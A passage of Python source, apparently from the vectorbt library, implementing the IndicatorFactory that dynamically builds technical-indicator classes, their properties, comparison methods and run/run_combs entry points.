for _output in output:
__output_list, __other_list = _split_output(_output)
output_list.append(__output_list)
if len(__other_list) > 0:
other_list.append(__other_list)
# Concatenate each output (must be one column wide)
output_list = [np.hstack(input_group) for input_group in zip(*output_list)]
else:
output_list, other_list = _split_output(output)
# In-place outputs are treated as outputs from here
output_list = in_output_list + output_list
# Prepare raw
param_map = list(zip(*param_list_unique)) # account for use_speedup
output_shape = output_list[0].shape
for output in output_list:
if output.shape != output_shape:
raise ValueError("All outputs must have the same shape")
if per_column:
n_input_cols = 1
else:
n_input_cols = output_shape[1] // n_unique_param_values
if input_shape_2d is not None:
if n_input_cols != input_shape_2d[1]:
if per_column:
raise ValueError("All outputs must have one column when per_column=True")
else:
raise ValueError("All outputs must have the number of columns = #input columns x #parameters")
raw = output_list, param_map, n_input_cols, other_list
if return_raw:
if use_speedup and not silence_warnings:
warnings.warn("Raw output is produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
return raw
if use_speedup:
output_list, param_map, n_input_cols, other_list = _use_raw(raw)
# Update shape and other meta if no inputs
if input_shape is None:
if n_input_cols == 1:
input_shape = (output_list[0].shape[0],)
else:
input_shape = (output_list[0].shape[0], n_input_cols)
else:
input_shape = orig_input_shape
if input_index is None:
input_index = pd.RangeIndex(start=0, step=1, stop=input_shape[0])
if input_columns is None:
input_columns = pd.RangeIndex(start=0, step=1, stop=input_shape[1] if len(input_shape) > 1 else 1)
# Build column hierarchy and create mappers
if len(param_list) > 0:
# Build new column levels on top of input levels
param_indexes, new_columns = build_columns(
param_list,
input_columns,
level_names=level_names,
hide_levels=hide_levels,
param_settings=param_settings,
per_column=per_column,
**stacking_kwargs
)
# Build a mapper that maps old columns in inputs to new columns
# Instead of tiling all inputs to the shape of outputs and wasting memory,
# we just keep a mapper and perform the tiling when needed
input_mapper = None
if len(input_list) > 0:
if per_column:
input_mapper = np.arange(len(input_columns))
else:
input_mapper = np.tile(np.arange(len(input_columns)), n_param_values)
# Build mappers to easily map between parameters and columns
mapper_list = [param_indexes[i] for i in range(len(param_list))]
else:
# Some indicators don't have any params
new_columns = input_columns
input_mapper = None
mapper_list = []
# Return artifacts: no pandas objects, just a wrapper and NumPy arrays
new_ndim = len(input_shape) if output_list[0].shape[1] == 1 else output_list[0].ndim
wrapper = ArrayWrapper(input_index, new_columns, new_ndim, **wrapper_kwargs)
return wrapper, \
input_list, \
input_mapper, \
output_list[:len(in_output_list)], \
output_list[len(in_output_list):], \
param_list, \
mapper_list, \
other_list
def perform_init_checks(wrapper, input_list, input_mapper, in_output_list, output_list,
param_list, mapper_list, short_name, level_names):
"""Perform checks on objects created by running or slicing an indicator."""
if input_mapper is not None:
checks.assert_equal(input_mapper.shape[0], wrapper.shape_2d[1])
for ts in input_list:
checks.assert_equal(ts.shape[0], wrapper.shape_2d[0])
for ts in in_output_list + output_list:
checks.assert_equal(ts.shape, wrapper.shape_2d)
for params in param_list:
checks.assert_len_equal(param_list[0], params)
for mapper in mapper_list:
checks.assert_equal(len(mapper), wrapper.shape_2d[1])
checks.assert_type(short_name, str)
checks.assert_len_equal(level_names, param_list)
def combine_objs(obj, other, *args, level_name=None, keys=None, **kwargs):
"""Combines/compares `obj` to `other`, for example, to generate signals.
Both will be broadcast together.
Pass `other` as a tuple or a list to compare with multiple arguments.
In this case, a new column level will be created with the name `level_name`.
See `vectorbt.base.accessors.BaseAccessor.combine`."""
if isinstance(other, (tuple, list)):
if keys is None:
keys = index_fns.index_from_values(other, name=level_name)
return obj.vbt.combine(other, *args, keys=keys, concat=True, **kwargs)
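# Usage sketch for `combine_objs` (illustrative; assumes a pandas Series `price`
# and a broadcastable indicator output `ma`):
#
#     entries = combine_objs(price, (ma, ma * 1.01), combine_func=np.greater,
#                            level_name='price_above')
#
# Passing a tuple or list as `other` performs one combination per element and
# stacks the results along a new column level named `price_above`.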
class IndicatorFactory:
def __init__(self,
class_name='Indicator',
class_docstring='',
module_name=__name__,
short_name=None,
prepend_name=True,
input_names=None,
param_names=None,
in_output_names=None,
output_names=None,
output_flags=None,
custom_output_props=None,
attr_settings=None):
"""A factory for creating new indicators.
Initialize `IndicatorFactory` to create a skeleton and then use a class method
such as `IndicatorFactory.from_custom_func` to bind a calculation function to the skeleton.
Args:
class_name (str): Name for the created indicator class.
class_docstring (str): Docstring for the created indicator class.
module_name (str): Specify the module the class originates from.
short_name (str): A short name of the indicator.
Defaults to lower-case `class_name`.
prepend_name (bool): Whether to prepend `short_name` to each parameter level.
input_names (list of str): A list of names of input arrays.
param_names (list of str): A list of names of parameters.
in_output_names (list of str): A list of names of in-place output arrays.
An in-place output is an output that is not returned but modified in-place.
Some advantages of such outputs include:
1) they don't need to be returned,
2) they can be passed between functions as easily as inputs,
                3) they can be provided with already allocated data to save memory,
4) if data or default value are not provided, they are created empty to not occupy memory.
output_names (list of str): A list of names of output arrays.
output_flags (dict): A dictionary of in-place and regular output flags.
custom_output_props (dict): A dictionary with user-defined functions that will be
bound to the indicator class and (if not a property) wrapped with `@cached_property`.
attr_settings (dict): A dictionary of settings by attribute name.
Attributes can be `input_names`, `in_output_names`, `output_names` and `custom_output_props`.
                The following keys are accepted:
                * `dtype`: Data type used to determine which methods to generate around this attribute.
                    Set to None to disable. Default is `np.float_`. Can be set to an instance of
                    `collections.namedtuple` acting as an enumerated type; it will then create a property
                    with the suffix `readable` that contains the data in string format.
!!! note
            The `__init__` method is not used for running the indicator; for that, use `run`.
            The reason for this is indexing, which requires a clean `__init__` method for creating
            a new indicator object with newly indexed attributes.
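        ## Example
        A minimal skeleton (the names below are placeholders for illustration):
        ```python-repl
        >>> MyInd = vbt.IndicatorFactory(
        ...     input_names=['ts'],
        ...     param_names=['p'],
        ...     output_names=['out']
        ... )
        ```
        Bind a calculation function with `from_apply_func` or `from_custom_func` to
        turn this skeleton into a runnable indicator class.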
"""
# Check and save parameters
self.class_name = class_name
checks.assert_type(class_name, str)
self.class_docstring = class_docstring
checks.assert_type(class_docstring, str)
self.module_name = module_name
if module_name is not None:
checks.assert_type(module_name, str)
if short_name is None:
if class_name == 'Indicator':
short_name = 'custom'
else:
short_name = class_name.lower()
self.short_name = short_name
checks.assert_type(short_name, str)
self.prepend_name = prepend_name
checks.assert_type(prepend_name, bool)
if input_names is None:
input_names = []
checks.assert_type(input_names, (tuple, list))
self.input_names = input_names
if param_names is None:
param_names = []
checks.assert_type(param_names, (tuple, list))
self.param_names = param_names
if in_output_names is None:
in_output_names = []
checks.assert_type(in_output_names, (tuple, list))
self.in_output_names = in_output_names
if output_names is None:
output_names = []
checks.assert_type(output_names, (tuple, list))
self.output_names = output_names
all_output_names = in_output_names + output_names
if len(all_output_names) == 0:
raise ValueError("Must have at least one in-place or regular output")
if output_flags is None:
output_flags = {}
checks.assert_type(output_flags, dict)
if len(output_flags) > 0:
checks.assert_dict_valid(output_flags, [all_output_names])
self.output_flags = output_flags
if custom_output_props is None:
custom_output_props = {}
checks.assert_type(custom_output_props, dict)
self.custom_output_props = custom_output_props
if attr_settings is None:
attr_settings = {}
checks.assert_type(attr_settings, dict)
all_attr_names = input_names + all_output_names + list(custom_output_props.keys())
if len(attr_settings) > 0:
checks.assert_dict_valid(attr_settings, [all_attr_names])
self.attr_settings = attr_settings
# Set up class
ParamIndexer = ParamIndexerFactory(
param_names + (['tuple'] if len(param_names) > 1 else []),
module_name=module_name
)
Indicator = type(self.class_name, (Wrapping, ParamIndexer), {})
Indicator.__doc__ = self.class_docstring
if module_name is not None:
Indicator.__module__ = self.module_name
# Add indexing methods
def _indexing_func(obj, pd_indexing_func, **kwargs):
new_wrapper, idx_idxs, _, col_idxs = obj.wrapper._indexing_func_meta(pd_indexing_func, **kwargs)
idx_idxs_arr = reshape_fns.to_1d(idx_idxs, raw=True)
col_idxs_arr = reshape_fns.to_1d(col_idxs, raw=True)
if np.array_equal(idx_idxs_arr, np.arange(obj.wrapper.shape_2d[0])):
idx_idxs_arr = slice(None, None, None)
if np.array_equal(col_idxs_arr, np.arange(obj.wrapper.shape_2d[1])):
col_idxs_arr = slice(None, None, None)
input_mapper = getattr(obj, '_input_mapper', None)
if input_mapper is not None:
input_mapper = input_mapper[col_idxs_arr]
input_list = []
for input_name in input_names:
input_list.append(getattr(obj, f'_{input_name}')[idx_idxs_arr])
in_output_list = []
for in_output_name in in_output_names:
in_output_list.append(getattr(obj, f'_{in_output_name}')[idx_idxs_arr, :][:, col_idxs_arr])
output_list = []
for output_name in output_names:
output_list.append(getattr(obj, f'_{output_name}')[idx_idxs_arr, :][:, col_idxs_arr])
param_list = []
for param_name in param_names:
param_list.append(getattr(obj, f'_{param_name}_array'))
mapper_list = []
for param_name in param_names:
# Tuple mapper is a list because of its complex data type
mapper_list.append(getattr(obj, f'_{param_name}_mapper')[col_idxs_arr])
return obj.copy(
wrapper=new_wrapper,
input_list=input_list,
input_mapper=input_mapper,
in_output_list=in_output_list,
output_list=output_list,
param_list=param_list,
mapper_list=mapper_list
)
setattr(Indicator, '_indexing_func', _indexing_func)
# Create read-only properties
prop = property(lambda _self: _self._short_name)
prop.__doc__ = "Name of the indicator."
setattr(Indicator, 'short_name', prop)
prop = property(lambda _self: _self._level_names)
prop.__doc__ = "Column level names corresponding to each parameter."
setattr(Indicator, 'level_names', prop)
prop = classproperty(lambda _self: input_names)
prop.__doc__ = "Names of the input arrays."
setattr(Indicator, 'input_names', prop)
prop = classproperty(lambda _self: param_names)
prop.__doc__ = "Names of the parameters."
setattr(Indicator, 'param_names', prop)
prop = classproperty(lambda _self: in_output_names)
prop.__doc__ = "Names of the in-place output arrays."
setattr(Indicator, 'in_output_names', prop)
prop = classproperty(lambda _self: output_names)
prop.__doc__ = "Names of the regular output arrays."
setattr(Indicator, 'output_names', prop)
prop = classproperty(lambda _self: output_flags)
prop.__doc__ = "Dictionary of output flags."
setattr(Indicator, 'output_flags', prop)
for param_name in param_names:
prop = property(lambda _self, param_name=param_name: getattr(_self, f'_{param_name}_array'))
prop.__doc__ = f"Array of `{param_name}` combinations."
setattr(Indicator, f'{param_name}_array', prop)
for input_name in input_names:
def input_prop(_self, input_name=input_name):
"""Input array."""
old_input = reshape_fns.to_2d(getattr(_self, '_' + input_name), raw=True)
input_mapper = getattr(_self, '_input_mapper')
if input_mapper is None:
return _self.wrapper.wrap(old_input)
return _self.wrapper.wrap(old_input[:, input_mapper])
input_prop.__name__ = input_name
setattr(Indicator, input_name, cached_property(input_prop))
for output_name in all_output_names:
def output_prop(_self, _output_name=output_name):
return _self.wrapper.wrap(getattr(_self, '_' + _output_name))
if output_name in in_output_names:
output_prop.__doc__ = """In-place output array."""
else:
output_prop.__doc__ = """Output array."""
output_prop.__name__ = output_name
if output_name in output_flags:
_output_flags = output_flags[output_name]
if isinstance(_output_flags, (tuple, list)):
_output_flags = ', '.join(_output_flags)
output_prop.__doc__ += "\n\n" + _output_flags
setattr(Indicator, output_name, property(output_prop))
# Add __init__ method
def __init__(_self, wrapper, input_list, input_mapper, in_output_list, output_list,
param_list, mapper_list, short_name, level_names):
perform_init_checks(
wrapper,
input_list,
input_mapper,
in_output_list,
output_list,
param_list,
mapper_list,
short_name,
level_names
)
Wrapping.__init__(
_self,
wrapper,
input_list=input_list,
input_mapper=input_mapper,
in_output_list=in_output_list,
output_list=output_list,
param_list=param_list,
mapper_list=mapper_list,
short_name=short_name,
level_names=level_names
)
for i, ts_name in enumerate(input_names):
setattr(_self, f'_{ts_name}', input_list[i])
setattr(_self, '_input_mapper', input_mapper)
for i, in_output_name in enumerate(in_output_names):
setattr(_self, f'_{in_output_name}', in_output_list[i])
for i, output_name in enumerate(output_names):
setattr(_self, f'_{output_name}', output_list[i])
for i, param_name in enumerate(param_names):
setattr(_self, f'_{param_name}_array', param_list[i])
setattr(_self, f'_{param_name}_mapper', mapper_list[i])
if len(param_names) > 1:
tuple_mapper = list(zip(*list(mapper_list)))
setattr(_self, '_tuple_mapper', tuple_mapper)
else:
tuple_mapper = None
setattr(_self, '_short_name', short_name)
setattr(_self, '_level_names', level_names)
# Initialize indexers
mapper_sr_list = []
for i, m in enumerate(mapper_list):
mapper_sr_list.append(pd.Series(m, index=wrapper.columns))
if tuple_mapper is not None:
mapper_sr_list.append(pd.Series(tuple_mapper, index=wrapper.columns))
ParamIndexer.__init__(
_self, mapper_sr_list,
level_names=[*level_names, tuple(level_names)]
)
setattr(Indicator, '__init__', __init__)
# Add user-defined outputs
for prop_name, prop in custom_output_props.items():
if prop.__doc__ is None:
prop.__doc__ = f"""Custom property."""
if not isinstance(prop, (property, cached_property)):
prop.__name__ = prop_name
prop = cached_property(prop)
setattr(Indicator, prop_name, prop)
# Add comparison & combination methods for all inputs, outputs, and user-defined properties
for attr_name in all_attr_names:
_attr_settings = attr_settings.get(attr_name, {})
checks.assert_dict_valid(_attr_settings, [['dtype']])
dtype = _attr_settings.get('dtype', np.float_)
if checks.is_namedtuple(dtype):
def attr_readable(_self, attr_name=attr_name, enum=dtype):
if _self.wrapper.ndim == 1:
return getattr(_self, attr_name).map(lambda x: '' if x == -1 else enum._fields[x])
return getattr(_self, attr_name).applymap(lambda x: '' if x == -1 else enum._fields[x])
attr_readable.__qualname__ = f'{Indicator.__name__}.{attr_name}_readable'
attr_readable.__doc__ = f"""{attr_name} in readable format based on enum {dtype}."""
setattr(Indicator, f'{attr_name}_readable', property(attr_readable))
elif np.issubdtype(dtype, np.number):
def assign_numeric_method(func_name, combine_func, attr_name=attr_name):
def numeric_method(_self, other, crossover=False, wait=0, after_false=True,
level_name=None, prepend_name=prepend_name, **kwargs):
if isinstance(other, _self.__class__):
other = getattr(other, attr_name)
if level_name is None:
if prepend_name:
if attr_name == _self.short_name:
level_name = f'{_self.short_name}_{func_name}'
else:
level_name = f'{_self.short_name}_{attr_name}_{func_name}'
else:
level_name = f'{attr_name}_{func_name}'
out = combine_objs(
getattr(_self, attr_name),
other,
combine_func=combine_func,
level_name=level_name,
**kwargs
)
if crossover:
return out.vbt.signals.nst(wait + 1, after_false=after_false)
return out
numeric_method.__qualname__ = f'{Indicator.__name__}.{attr_name}_{func_name}'
numeric_method.__doc__ = f"""Return True for each element where `{attr_name}` is {func_name} `other`.
Set `crossover` to True to return the first True after crossover. Specify `wait` to return
True only when `{attr_name}` is {func_name} for a number of time steps in a row after crossover.
See `vectorbt.indicators.factory.combine_objs`."""
setattr(Indicator, f'{attr_name}_{func_name}', numeric_method)
assign_numeric_method('above', np.greater)
assign_numeric_method('below', np.less)
assign_numeric_method('equal', np.equal)
elif np.issubdtype(dtype, np.bool_):
def assign_bool_method(func_name, combine_func, attr_name=attr_name):
def bool_method(_self, other, level_name=None, prepend_name=prepend_name, **kwargs):
if isinstance(other, _self.__class__):
other = getattr(other, attr_name)
if level_name is None:
if prepend_name:
if attr_name == _self.short_name:
level_name = f'{_self.short_name}_{func_name}'
else:
level_name = f'{_self.short_name}_{attr_name}_{func_name}'
else:
level_name = f'{attr_name}_{func_name}'
return combine_objs(
getattr(_self, attr_name),
other,
combine_func=combine_func,
level_name=level_name,
**kwargs
)
bool_method.__qualname__ = f'{Indicator.__name__}.{attr_name}_{func_name}'
bool_method.__doc__ = f"""Return `{attr_name} {func_name.upper()} other`.
See `vectorbt.indicators.factory.combine_objs`."""
setattr(Indicator, f'{attr_name}_{func_name}', bool_method)
assign_bool_method('and', np.logical_and)
assign_bool_method('or', np.logical_or)
assign_bool_method('xor', np.logical_xor)
self.Indicator = Indicator
def from_custom_func(self,
custom_func,
require_input_shape=False,
param_settings=None,
in_output_settings=None,
hide_params=None,
hide_default=True,
var_args=False,
keyword_only_args=False,
**pipeline_kwargs):
"""Build indicator class around a custom calculation function.
        In contrast to `IndicatorFactory.from_apply_func`, this method offers full flexibility.
        It's up to you to handle caching and to concatenate columns for each parameter (for example,
        by using `vectorbt.base.combine_fns.apply_and_concat_one`). Also, you should ensure that
        each output array has an appropriate number of columns, which is the number of columns in
        the input arrays multiplied by the number of parameter combinations.
Args:
custom_func (callable): A function that takes broadcast arrays corresponding
to `input_names`, broadcast in-place output arrays corresponding to `in_output_names`,
broadcast parameter arrays corresponding to `param_names`, and other arguments and
keyword arguments, and returns outputs corresponding to `output_names` and other objects
that are then returned with the indicator instance.
Can be Numba-compiled.
!!! note
Shape of each output should be the same and match the shape of each input stacked
n times (= the number of parameter values) along the column axis.
            require_input_shape (bool): Whether the input shape is required.
param_settings (dict): A dictionary of parameter settings keyed by name.
See `run_pipeline` for keys.
Can be overwritten by any run method.
in_output_settings (dict): A dictionary of in-place output settings keyed by name.
See `run_pipeline` for keys.
Can be overwritten by any run method.
hide_params (list): Parameter names to hide column levels for.
Can be overwritten by any run method.
hide_default (bool): Whether to hide column levels of parameters with default value.
Can be overwritten by any run method.
var_args (bool): Whether run methods should accept variable arguments (`*args`).
                Set to True if `custom_func` accepts positional arguments that are not listed in the config.
keyword_only_args (bool): Whether run methods should accept keyword-only arguments (`*`).
Set to True to force the user to use keyword arguments (e.g., to avoid misplacing arguments).
**pipeline_kwargs: Keyword arguments passed to `run_pipeline`.
Can be overwritten by any run method.
Can contain default values for `param_names` and `in_output_names`,
but also custom positional and keyword arguments passed to the `custom_func`.
Returns:
`Indicator`, and optionally other objects that are returned by `custom_func`
and exceed `output_names`.
## Example
The following example produces the same indicator as the `IndicatorFactory.from_apply_func` example.
```python-repl
>>> @njit
        ... def apply_func_nb(i, ts1, ts2, p1, p2, arg1, arg2):
... return ts1 * p1[i] + arg1, ts2 * p2[i] + arg2
>>> @njit
... def custom_func(ts1, ts2, p1, p2, arg1, arg2):
... return vbt.base.combine_fns.apply_and_concat_multiple_nb(
... len(p1), apply_func_nb, ts1, ts2, p1, p2, arg1, arg2)
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2'],
... param_names=['p1', 'p2'],
... output_names=['o1', 'o2']
... ).from_custom_func(custom_func, var_args=True, arg2=200)
>>> myInd = MyInd.run(price, price * 2, [1, 2], [3, 4], 100)
>>> myInd.o1
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 101.0 105.0 102.0 110.0
2020-01-02 102.0 104.0 104.0 108.0
2020-01-03 103.0 103.0 106.0 106.0
2020-01-04 104.0 102.0 108.0 104.0
2020-01-05 105.0 101.0 110.0 102.0
>>> myInd.o2
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 206.0 230.0 208.0 240.0
2020-01-02 212.0 224.0 216.0 232.0
2020-01-03 218.0 218.0 224.0 224.0
2020-01-04 224.0 212.0 232.0 216.0
2020-01-05 230.0 206.0 240.0 208.0
```
The difference between `apply_func_nb` here and in `IndicatorFactory.from_apply_func` is that
here it takes the index of the current parameter combination that can be used for parameter selection.
        You can also remove `apply_func_nb` entirely and define your logic in `custom_func`
        (which doesn't necessarily have to be Numba-compiled):
```python-repl
>>> @njit
... def custom_func(ts1, ts2, p1, p2, arg1, arg2):
... input_shape = ts1.shape
... n_params = len(p1)
... out1 = np.empty((input_shape[0], input_shape[1] * n_params), dtype=np.float_)
... out2 = np.empty((input_shape[0], input_shape[1] * n_params), dtype=np.float_)
... for k in range(n_params):
... for col in range(input_shape[1]):
... for i in range(input_shape[0]):
... out1[i, input_shape[1] * k + col] = ts1[i, col] * p1[k] + arg1
... out2[i, input_shape[1] * k + col] = ts2[i, col] * p2[k] + arg2
... return out1, out2
```
"""
Indicator = self.Indicator
short_name = self.short_name
prepend_name = self.prepend_name
input_names = self.input_names
param_names = self.param_names
in_output_names = self.in_output_names
output_names = self.output_names
all_input_names = input_names + param_names + in_output_names
setattr(Indicator, 'custom_func', custom_func)
def _merge_settings(old_settings, new_settings, allowed_keys=None):
new_settings = merge_dicts(old_settings, new_settings)
if len(new_settings) > 0 and allowed_keys is not None:
checks.assert_dict_valid(new_settings, allowed_keys)
return new_settings
def _resolve_refs(input_list, param_list, in_output_list):
# You can reference anything between inputs, parameters, and in-place outputs
# even parameter to input (thanks to broadcasting)
all_inputs = list(input_list + param_list + in_output_list)
for i in range(len(all_inputs)):
input = all_inputs[i]
is_default = False
if isinstance(input, DefaultParam):
input = input.value
is_default = True
if isinstance(input, str):
if input in all_input_names:
new_input = all_inputs[all_input_names.index(input)]
if is_default:
new_input = DefaultParam(new_input)
all_inputs[i] = new_input
input_list = all_inputs[:len(input_list)]
all_inputs = all_inputs[len(input_list):]
param_list = all_inputs[:len(param_list)]
in_output_list = all_inputs[len(param_list):]
return input_list, param_list, in_output_list
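        # For illustration: a parameter passed as the string 'ts1' (a name from
        # `all_input_names`) is resolved to the broadcast `ts1` array itself rather
        # than being treated as a literal string value.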
def _extract_inputs(args):
input_list = args[:len(input_names)]
checks.assert_len_equal(input_list, input_names)
args = args[len(input_names):]
param_list = args[:len(param_names)]
checks.assert_len_equal(param_list, param_names)
args = args[len(param_names):]
in_output_list = args[:len(in_output_names)]
checks.assert_len_equal(in_output_list, in_output_names)
args = args[len(in_output_names):]
if not var_args and len(args) > 0:
raise TypeError("Variable length arguments are not supported by this function "
"(var_args is set to False)")
input_list, param_list, in_output_list = _resolve_refs(input_list, param_list, in_output_list)
return input_list, param_list, in_output_list, args
for k, v in pipeline_kwargs.items():
if k in param_names and not isinstance(v, DefaultParam):
pipeline_kwargs[k] = DefaultParam(v) # track default params
pipeline_kwargs = merge_dicts({k: None for k in in_output_names}, pipeline_kwargs)
# Display default parameters and in-place outputs in the signature
default_kwargs = {}
for k in list(pipeline_kwargs.keys()):
if k in input_names or k in param_names or k in in_output_names:
default_kwargs[k] = pipeline_kwargs.pop(k)
if var_args and keyword_only_args:
raise ValueError("var_args and keyword_only_args cannot be used together")
# Add private run method
def_run_kwargs = dict(
short_name=short_name,
hide_params=hide_params,
hide_default=hide_default,
**default_kwargs
)
@classmethod
def _run(cls,
*args,
_param_settings=param_settings,
_in_output_settings=in_output_settings,
_pipeline_kwargs=pipeline_kwargs,
**kwargs):
_short_name = kwargs.pop('short_name', def_run_kwargs['short_name'])
_hide_params = kwargs.pop('hide_params', def_run_kwargs['hide_params'])
_hide_default = kwargs.pop('hide_default', def_run_kwargs['hide_default'])
_param_settings = _merge_settings(
_param_settings,
kwargs.pop('param_settings', {}),
[param_names]
)
_in_output_settings = _merge_settings(
_in_output_settings,
kwargs.pop('in_output_settings', {}),
[in_output_names]
)
if _hide_params is None:
_hide_params = []
args = list(args)
# Extract inputs
input_list, param_list, in_output_list, args = _extract_inputs(args)
# Prepare column levels
level_names = []
hide_levels = []
for i, pname in enumerate(param_names):
level_name = _short_name + '_' + pname if prepend_name else pname
level_names.append(level_name)
if pname in _hide_params or (_hide_default and isinstance(param_list[i], DefaultParam)):
hide_levels.append(i)
level_names = list(level_names)
param_list = [params.value if isinstance(params, DefaultParam) else params for params in param_list]
# Run the pipeline
results = run_pipeline(
len(output_names), # number of returned outputs
custom_func,
*args,
require_input_shape=require_input_shape,
input_list=input_list,
in_output_list=in_output_list,
param_list=param_list,
level_names=level_names,
hide_levels=hide_levels,
param_settings=[_param_settings.get(n, {}) for n in param_names],
in_output_settings=[_in_output_settings.get(n, {}) for n in in_output_names],
**merge_dicts(_pipeline_kwargs, kwargs)
)
# Return the raw result if any of the flags are set
if kwargs.get('return_raw', False) or kwargs.get('return_cache', False):
return results
# Unpack the result
wrapper, \
new_input_list, \
input_mapper, \
in_output_list, \
output_list, \
new_param_list, \
mapper_list, \
other_list = results
# Create a new instance
obj = cls(
wrapper,
new_input_list,
input_mapper,
in_output_list,
output_list,
new_param_list,
mapper_list,
short_name,
level_names
)
if len(other_list) > 0:
return (obj, *tuple(other_list))
return obj
setattr(Indicator, '_run', _run)
# Add public run method
# Create function dynamically to provide user with a proper signature
def compile_run_function(func_name, docstring, default_kwargs):
pos_names = []
main_kw_names = []
other_kw_names = []
for k in input_names + param_names:
if k in default_kwargs:
main_kw_names.append(k)
else:
pos_names.append(k)
main_kw_names.extend(in_output_names) # in_output_names are keyword-only
for k, v in default_kwargs.items():
if k not in pos_names and k not in main_kw_names:
other_kw_names.append(k)
_0 = func_name
_1 = '*, ' if keyword_only_args else ''
_2 = []
if require_input_shape:
_2.append('input_shape')
_2.extend(pos_names)
_2 = ', '.join(_2) + ', ' if len(_2) > 0 else ''
_3 = '*args, ' if var_args else ''
_4 = ['{}={}'.format(k, k) for k in main_kw_names + other_kw_names]
_4 = ', '.join(_4) + ', ' if len(_4) > 0 else ''
_5 = docstring
_6 = all_input_names
_6 = ', '.join(_6) + ', ' if len(_6) > 0 else ''
_7 = []
if require_input_shape:
_7.append('input_shape')
_7.extend(other_kw_names)
_7 = ['{}={}'.format(k, k) for k in _7]
_7 = ', '.join(_7) + ', ' if len(_7) > 0 else ''
func_str = "@classmethod\n" \
"def {0}(cls, {1}{2}{3}{4}**kwargs):\n" \
" \"\"\"{5}\"\"\"\n" \
" return cls._{0}({6}{3}{7}**kwargs)".format(
_0, _1, _2, _3, _4, _5, _6, _7
)
scope = {**dict(DefaultParam=DefaultParam), **default_kwargs}
filename = inspect.getfile(lambda: None)
code = compile(func_str, filename, 'single')
exec(code, scope)
return scope[func_name]
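        # For illustration, with input_names=['ts'], param_names=['p'] and a default
        # of p=2, the generated classmethod roughly reads:
        #     def run(cls, ts, p=2, short_name='custom', hide_params=None,
        #             hide_default=True, **kwargs):
        #         return cls._run(ts, p, short_name=short_name, ..., **kwargs)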
_0 = self.class_name
_1 = ''
if len(self.input_names) > 0:
_1 += '\n* Inputs: ' + ', '.join(map(lambda x: f'`{x}`', self.input_names))
if len(self.in_output_names) > 0:
_1 += '\n* In-place outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.in_output_names))
if len(self.param_names) > 0:
_1 += '\n* Parameters: ' + ', '.join(map(lambda x: f'`{x}`', self.param_names))
if len(self.output_names) > 0:
_1 += '\n* Outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.output_names))
run_docstring = """Run `{0}` indicator.
{1}
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.""".format(_0, _1)
run = compile_run_function('run', run_docstring, def_run_kwargs)
setattr(Indicator, 'run', run)
if len(param_names) > 0:
# Add private run_combs method
def_run_combs_kwargs = dict(
r=2,
param_product=False,
comb_func=itertools.combinations,
speedup=True,
short_names=None,
hide_params=hide_params,
hide_default=hide_default,
**default_kwargs
)
@classmethod
def _run_combs(cls,
*args,
_param_settings=param_settings,
**kwargs):
_r = kwargs.pop('r', def_run_combs_kwargs['r'])
_param_product = kwargs.pop('param_product', def_run_combs_kwargs['param_product'])
_comb_func = kwargs.pop('comb_func', def_run_combs_kwargs['comb_func'])
_speedup = kwargs.pop('speedup', def_run_combs_kwargs['speedup'])
_short_names = kwargs.pop('short_names', def_run_combs_kwargs['short_names'])
_hide_params = kwargs.pop('hide_params', def_run_kwargs['hide_params'])
_hide_default = kwargs.pop('hide_default', def_run_kwargs['hide_default'])
_param_settings = _merge_settings(
_param_settings,
kwargs.get('param_settings', {}), # get, not pop
[param_names]
)
if _hide_params is None:
_hide_params = []
if _short_names is None:
_short_names = [f'{short_name}_{str(i + 1)}' for i in range(_r)]
args = list(args)
# Extract inputs
input_list, param_list, in_output_list, args = _extract_inputs(args)
# Hide params
for i, pname in enumerate(param_names):
if _hide_default and isinstance(param_list[i], DefaultParam):
if pname not in _hide_params:
_hide_params.append(pname)
param_list[i] = param_list[i].value
checks.assert_len_equal(param_list, param_names)
# Prepare params
param_settings_list = [_param_settings.get(n, {}) for n in param_names]
for i in range(len(param_list)):
is_tuple = param_settings_list[i].get('is_tuple', False)
is_array_like = param_settings_list[i].get('is_array_like', False)
param_list[i] = params_to_list(param_list[i], is_tuple, is_array_like)
if _param_product:
param_list = create_param_product(param_list)
else:
param_list = broadcast_params(param_list)
if not isinstance(param_list, (tuple, list)):
param_list = [param_list]
# Speed up by pre-calculating raw outputs
if _speedup:
raw_results = cls._run(
*input_list,
*param_list,
*in_output_list,
*args,
return_raw=True,
speedup=False,
**kwargs
)
kwargs['use_raw'] = raw_results # use them next time
# Generate indicator instances
instances = []
if _comb_func == itertools.product:
param_lists = zip(*_comb_func(zip(*param_list), repeat=_r))
else:
param_lists = zip(*_comb_func(zip(*param_list), _r))
for i, param_list in enumerate(param_lists):
instances.append(cls._run(
*input_list,
*zip(*param_list),
*in_output_list,
*args,
short_name=_short_names[i],
hide_params=_hide_params,
hide_default=_hide_default,
speedup=False,
**kwargs
))
return tuple(instances)
setattr(Indicator, '_run_combs', _run_combs)
# Add public run_combs method
_0 = self.class_name
_1 = ''
if len(self.input_names) > 0:
_1 += '\n* Inputs: ' + ', '.join(map(lambda x: f'`{x}`', self.input_names))
if len(self.in_output_names) > 0:
_1 += '\n* In-place outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.in_output_names))
if len(self.param_names) > 0:
_1 += '\n* Parameters: ' + ', '.join(map(lambda x: f'`{x}`', self.param_names))
if len(self.output_names) > 0:
_1 += '\n* Outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.output_names))
run_combs_docstring = """Create a combination of multiple `{0}` indicators using function `comb_func`.
{1}
`comb_func` must accept an iterable of parameter tuples and `r`.
Also accepts all combinatoric iterators from itertools such as `itertools.combinations`.
Pass `r` to specify how many indicators to run.
Pass `short_names` to specify the short name for each indicator.
Set `speedup` to True to first compute raw outputs for all parameters,
and then use them to build each indicator (faster).
Other keyword arguments are passed to `{0}.run`.""".format(_0, _1)
run_combs = compile_run_function('run_combs', run_combs_docstring, def_run_combs_kwargs)
setattr(Indicator, 'run_combs', run_combs)
return Indicator
def from_apply_func(self, apply_func, cache_func=None, pass_packed=False, kwargs_to_args=None,
numba_loop=False, use_ray=False, ray_kwargs=None, **kwargs):
"""Build indicator class around a custom apply function.
